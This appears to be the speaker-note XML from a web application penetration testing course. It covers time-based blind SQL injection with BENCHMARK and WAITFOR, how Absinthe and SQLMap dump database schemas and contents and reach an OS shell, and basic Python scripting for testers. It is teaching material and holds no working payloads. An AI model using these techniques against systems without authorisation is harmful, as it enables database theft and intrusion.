              <a:t>Sometimes the Boolean condition we are looking for does not show as data on the page.  The two states are found through the delay in returning a page to the browser.  To enhance this timing, we can use the various delay functions within different database engines to increase the time for true conditions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Benchmark is a MySQL function, while waitfor is from MS SQL.</a:t>
            </a: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105</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="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Rot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="314371"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dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Very few tools are available that reliably test blind SQL injection.  We are going to explore Absinthe and SQLMap which are two of the few tools available.</a:t>
            </a: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106</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="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Rot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="315395"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dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Absinthe is a GUI-based tool that automates the process of downloading the schema and contents of a database which is vulnerable to Blind SQL Injection.  It is written in C# and will run on Windows or Linux using Mono. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Absinthe will not detect vulnerable applications.  It requires the attacker to find the flaw and configure Absinthe to make use of it.  After that it will run and dump various things from the database, including all of the data.</a:t>
            </a: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107</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="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a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Once we determine that there is a SQL injection vulnerability, we can use Absinthe to retrieve the database.  After starting it up, we need to configure Absinthe to use the application and set any authentication needed.  After that, the parameters used within the page need to be configured.  The parameter that is vulnerable is set as "injectable."  Initializing the injection lets Absinthe test the configuration.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The screenshot above shows the main panel or tab.  It is where you configure Absinthe to abuse the injection flaw that you have found.  As you can see, Absinthe has quite a few parameters including places for authentication and the connection method required.  At the bottom of the tab is where the attacker specifies the various parameters required by the web application being attacked and marks the one(s) that is vulnerable.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRP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108</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="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Rot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="317443"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a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Using the next two tabs, the attacker is able to map out the entire database schema and the user name that the application uses to connect to the DB.  They are then able to select the fields they would like to export, and dump them to an XML file.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>In the screenshot is the tab that enables us to map out the DB schema.  First you will retrieve the username used by the application to connect to the database.  This will potentially allow you to know the privileges available within the DB.  You can then retrieve the table names.  After that, you can select the table you are interested in and retrieve its field names.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Finally on the third tab, you configure which fields you are interested in and Absinthe will download them into an XML document.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRP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109</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Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10242" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="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dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>As with most scripting languages, each statement is a command to the language.  An interesting difference from the other languages we have discussed is that variables are not denoted with a $ or other special character.  The python processor recognizes the variables since they are not built-in commands.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
              <a:cs typeface="MS PGothic" charset="0"/>
            </a:endParaRP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11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="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Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="318467" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="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dirty="0" err="1">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>SQLMap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> is a command line tool written in Python.  It is able to perform SQL injection attacks against applications, blind and normal.  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>SQLMap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> will run on any platform that Python supports.  It is available as a stand-alone tool, but has also been included in more recent versions of w3af.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRP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110</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="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Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="319491" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="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a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>SQLMap has a number of interesting features.  It performs two different types of SQL injection, in-band and blind.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>In-band injection is used when the record set is written to the page.  This allows for the return of the entire record set at once.  Blind injection sees the enumeration techniques based on different results with good queries and bad queries.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>SQLMap will also perform injection against targets found via Google.  This is not typically useful during a pen-test because of the potential for attacking out of scope targets.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>SQLMap will also read arbitrary files from the target database server and interact with the OS shell.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRP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111</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="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Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="348163" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="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a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>And now we will wrap it up for the day.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRP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112</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="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9186" name="Text Box 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>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lIns="95139" tIns="49472" rIns="95139" bIns="49472"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="3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dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Now, you've finished PEWAPT101.3: Server-side Discovery. You've examined web sites and found vulnerabilities. You've actually sent malicious traffic up to the application and seen the results. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="3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GB" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="3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dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Get a good night's sleep!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="3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GB" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="3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GB" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="349187" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1219200" y="720725"/>
            <a:ext cx="4800600" cy="3600450"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr>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113</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MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Python requires us to pay attention to whitespace as it is how the language understands blocks of code such as loops and conditionals.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ea typeface="MS PGothic" charset="0"/>
              <a:cs typeface="MS PGothic"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ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>We use the hash (#) mark for single line comments. We</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> can also do multi-line comments using the """ or the '''.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
              <a:cs typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{CE86D591-EB46-49C9-B58B-417466F1609D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="583379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noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14338" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="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dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Python is slightly different from the other covered languages as it does not have a switch statement.  For conditional functionality, we use the if/else construct.  When we have more than two conditions we chain elif (else if) statements for each condition we are testing for.</a:t>
            </a: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13</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Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12290" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="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dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>As with the other languages we cover, Python has the while  and for loops.  The while loop is for loops that need to run a variable numbers of times.  Such as if we are testing for session time-out, we may run a while loop checking to see if the html response is to redirect us to a login page.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
              <a:cs typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The for loop is to run the code a specific number of times.  Keep in mind that the specific condition may not be a number.  It may be something like, run this for every line in a file.</a:t>
            </a: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14</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noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16386" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="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dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Functions are used to create reusable pieces of code.  These can be declared anywhere in the code, but Python requires that they are defined before we try to use them.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
              <a:cs typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>To define a function, simply call def functionname().  We then can place any variables we want to accept within the function between the ().</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
              <a:cs typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The return statement will return data from the function to the section of code that called it.</a:t>
            </a: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15</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noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18434" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="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dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>One of the main reasons that Python is so popular is its standard library.  Unlike many languages where we are forced to install packages and modules to perform most of what we want to do, Python includes many of the most common functions.  Some examples that are of interest to us are HTTP processing, regular expression handling, compression utilities and encryption.  There is even basic functionality to parse HTML!</a:t>
            </a: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16</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noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30722" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="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dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Three libraries are available to do various things with HTTP.  (This is one of the big changes in Python 3.0, they are consolidated.)  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
              <a:cs typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>To perform a simple request and retrieve the response, the script above makes use of the httplib.  Once we have made the connection and sent the request, the response is assigned to the resp variable.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
              <a:cs typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>We can then use statements such as the resp.getheader() to retrieve the various headers in the response.  For example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
              <a:cs typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> print resp.getheader("Set-Cookie")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
              <a:cs typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>will print any cookies being set in this response.</a:t>
            </a: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17</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a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32770" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="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dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Another simple function is accessing files.  It is very common for us to want to read files that contain items for our test, passwords and user names are two examples that spring to mind.  We also want to write results to a file quite often.  Python provides access to a file handle using the open statement.  Once we have that handle, we can either read or write to the file.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
              <a:cs typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Reading files is done through three different methods:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>	read which loads the entire file into a string</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>	readline which retrieves one line from the file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>	readlines which returns the file and a series of lines in a list</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
              <a:cs typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Python allows us to loop through the file by using the following for loop:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>	for line in infile:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
              <a:cs typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Writing files is simple using the write method.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>	file.write('String to write to the file')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
              <a:cs typeface="MS PGothic" charset="0"/>
            </a:endParaRP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18</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a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34819" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="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dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>In this exercise, we will write a series of scripts based on what we have just learned.  These scripts can then be used as a basis for scripts during our real penetration tests after class is finished.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
              <a:cs typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
              <a:cs typeface="MS PGothic" charset="0"/>
            </a:endParaRP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19</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Rot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="179203"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pPr>
              <a:spcBef>
                <a:spcPts val="363"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>In this class, we will learn the practical art of web application penetration testing. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="363"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-GB">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="363"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>On Day 1, we will examine the attacker's perspective, and learn why it is important for us to build and deploy web application with the attacker's perspective in mind</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>. We will also cover the pieces of a penetration test and how to scope and prepare for one.  Finally, we will explore the methodology that will be covered through the rest of class.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="363"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="363"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>During Day 2, we will step through the process that successful attackers use to exploit applications, focusing specifically on the reconnaissance and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>mapping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> stages of the process.  This will give us the foundation we need to later control the application.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="363"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-GB">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="363"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>On Day 3, we will build upon that foundation and start discovering the various weaknesses within the applications.  As penetration testers, we will map out the attack vectors that we are going to use against this application. These discoveries will be the basis for the exploitation phase.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="363"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-GB">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="363"/>
              </a:spcBef>
